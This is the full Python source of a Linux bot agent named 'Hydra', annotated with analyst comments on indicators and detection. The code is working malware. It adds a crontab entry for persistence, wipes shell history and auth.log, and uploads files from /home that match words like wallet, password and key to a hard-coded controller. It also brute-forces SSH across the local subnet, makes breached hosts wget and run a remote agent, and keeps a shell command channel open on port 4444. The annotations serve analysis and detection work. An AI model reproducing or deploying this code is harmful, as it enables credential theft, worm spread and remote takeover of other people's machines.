import socket, subprocess, os, time, random, threading, sys, requests, glob

# Analyst note: hard-coded controller address, the primary network indicator
# for this sample. Within this file it is contacted on three ports:
#   - 8000/tcp HTTP: /upload (file uploads) and /register_gpu (GPU inventory)
#   - 80/tcp HTTP: /agent.py, fetched by hosts reached through worm()
#   - 4444/tcp raw socket: command channel opened by connect()
C2_IP = "80.78.25.235"
# Plain-HTTP upload endpoint used by exfiltrate(); bodies are not encrypted in transit.
UPLOAD_URL = f"http://{C2_IP}:8000/upload"

class Hydra:
    """Bot agent, annotated here for analysis and detection engineering.

    Constructing an instance immediately installs cron persistence, attempts
    to clear shell history and auth logging, and starts three background
    threads: file harvesting (loot_goblin), GPU inventory (check_hardware)
    and SSH propagation (worm). connect() then holds a cleartext command
    channel to C2_IP on TCP 4444.
    """

    def __init__(self):
        """Generate a per-run id, then run persistence, log tampering and the worker threads."""
        # Five-digit id regenerated on every start, so it does not identify a
        # host across restarts. It appears in the HYDRA_<uid>_ONLINE beacon and
        # in the register_gpu POST body.
        self.uid = str(random.randint(10000,99999))
        # Both calls run synchronously before any thread starts.
        self.persist()
        self.wipe_logs()
        threading.Thread(target=self.loot_goblin).start()
        threading.Thread(target=self.check_hardware).start()
        threading.Thread(target=self.worm).start()

    def persist(self):
        """Append an @reboot entry for this script to the invoking user's crontab."""
        # Host indicators: a crontab line containing "@reboot python3 <path> &",
        # and a python process spawning `crontab -l` / `crontab -`.
        # The existing crontab is re-read and one line appended on every run, so
        # repeated executions leave duplicate entries (useful for a timeline).
        try: os.system(f'(crontab -l 2>/dev/null; echo "@reboot python3 {os.path.abspath(__file__)} &") | crontab -')
        except: pass

    def wipe_logs(self):
        """Try to clear shell history and overwrite /var/log/auth.log."""
        # Anti-forensics step. The command runs in a child shell started by
        # os.system, so on-disk history files are not touched by this line and
        # remain worth collecting. The redirect needs write access to auth.log;
        # an auth.log that suddenly holds only a newline is itself an indicator.
        # Shipping auth logs off-host keeps the record if this succeeds.
        try: os.system("history -c && echo '' > /var/log/auth.log")
        except: pass

    def loot_goblin(self):
        """Walk /home and upload files whose name or content matches a keyword list."""
        # Substring match, case-insensitive, against file names and file bodies.
        keywords = ["gift", "card", "wallet", "bitcoin", "password", "secret", "balance", "key"]
        for root, dirs, files in os.walk("/home"):
            for file in files:
                try:
                    path = os.path.join(root, file)
                    # Files larger than 5,000,000 bytes are skipped entirely.
                    if os.path.getsize(path) > 5000000: continue
                    # Name match: uploaded without reading the content.
                    if any(k in file.lower() for k in keywords):
                        self.exfiltrate(path)
                    # Otherwise only text/config/key extensions are opened and searched.
                    elif file.endswith((".txt", ".json", ".xml", ".config", ".env", ".pem")):
                        with open(path, "r", errors='ignore') as f:
                            if any(k in f.read().lower() for k in keywords):
                                self.exfiltrate(path)
                # Unreadable files and permission errors are silently skipped.
                except: pass
        # Detection: one python process reading many files under /home, paired
        # with a burst of HTTP POSTs to UPLOAD_URL.

    def check_hardware(self):
        """Report the host's NVIDIA GPU name, if any, to the controller."""
        try:
            # Process indicator: python spawning nvidia-smi with --query-gpu=name.
            gpu = subprocess.getoutput("nvidia-smi --query-gpu=name --format=csv,noheader")
            if "NVIDIA" in gpu:
                # Form-encoded POST carrying the run id and GPU name, plain HTTP on port 8000.
                requests.post(f"http://{C2_IP}:8000/register_gpu", data={"uid": self.uid, "gpu": gpu})
        except: pass

    def worm(self):
        """Attempt password SSH logins across the local /24 and run the agent on success."""
        # Lateral movement via default credentials (password equal to username).
        try:
            # The subnet is the first three octets of the first address `hostname -I` prints.
            my_ip = subprocess.getoutput("hostname -I").split()[0]
            subnet = ".".join(my_ip.split(".")[:3])
            users = ["root", "admin", "ubuntu", "user"]
            # Hosts .1 through .254, four usernames each: 1016 attempts per run.
            for i in range(1, 255):
                target = f"{subnet}.{i}"
                for u in users:
                    # Each attempt is backgrounded (trailing &), so the sshpass/ssh
                    # processes are spawned in quick succession, a loud
                    # process-creation and outbound port-22 signal.
                    # On a successful login the remote host fetches
                    # http://<C2_IP>/agent.py to /tmp/.a and runs it with python3.
                    # Indicators: the file /tmp/.a, sshd auth failures for these four
                    # usernames from one internal source, sshpass in process logs.
                    # Mitigation: disable SSH password authentication, remove
                    # default credentials.
                    os.system(f"sshpass -p '{u}' ssh -o StrictHostKeyChecking=no {u}@{target} 'wget http://{C2_IP}/agent.py -O /tmp/.a; python3 /tmp/.a &' &")
        except: pass

    def exfiltrate(self, filepath):
        """Upload one file to UPLOAD_URL as a multipart POST.

        Args:
            filepath: path of the file to send; opened in binary mode.
        """
        try:
            with open(filepath, "rb") as f:
                # Multipart field name is "file"; 10-second timeout. The transfer is
                # plain HTTP, so file content is visible to network inspection/DLP.
                requests.post(UPLOAD_URL, files={"file": f}, timeout=10)
        # Any failure (unreadable file, network error) is dropped silently.
        except: pass

    def connect(self):
        """Hold a command channel to C2_IP:4444 and run received commands in a shell."""
        while True:
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((C2_IP, 4444))
                # Cleartext beacon; the literal "HYDRA_" prefix and "_ONLINE" suffix
                # are matchable by network signatures.
                s.send(f"HYDRA_{self.uid}_ONLINE\n".encode())
                while True:
                    data = s.recv(4096).decode()
                    if "exec" in data:
                        # Text after the first "exec " is passed to a shell and the
                        # output is sent back on the same socket, unencrypted.
                        s.send(subprocess.getoutput(data.split("exec ")[1]).encode())
            # Any error sleeps 10 seconds and reconnects, which produces periodic
            # outbound connection attempts to port 4444 while the controller is
            # unreachable or blocked.
            except: time.sleep(10)

if __name__ == "__main__":
    # Instantiation alone triggers persistence, log tampering and the three
    # worker threads (see Hydra.__init__); nothing is deferred to a later call.
    bot = Hydra()
    # Blocks indefinitely in the reconnect loop on the main thread.
    bot.connect()
